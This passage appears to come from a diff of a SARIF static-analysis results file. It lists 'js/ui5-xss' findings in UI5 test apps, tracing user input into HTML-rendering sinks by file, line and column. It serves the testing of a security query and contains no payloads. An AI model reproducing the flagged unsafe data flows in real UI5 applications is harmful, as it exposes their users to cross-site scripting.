\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fc87b07640e9d85:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5eac262ae765:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 37 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8ceecee7055f4fa2:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : { - "text" : "oInput.getValue()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 17, - "endColumn" : 42 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - }, - "region" : { - "startLine" : 5, - "startColumn" : 15, - "endColumn" : 33 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5d5122f6c75b5d01:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "/input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - }, - "message" : { - "text" : "/input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c18df3aa119b40dc:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "\"value\": \"{/input}\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - }, - "message" : { - "text" : "\"content\": \"{/input}\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "74b35e217af6aa05:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 50 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9caa0f252fbe2993:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 31, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 10, - "startColumn" : 44, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 32, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output1: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output1}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "2963bbd458e69924:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - 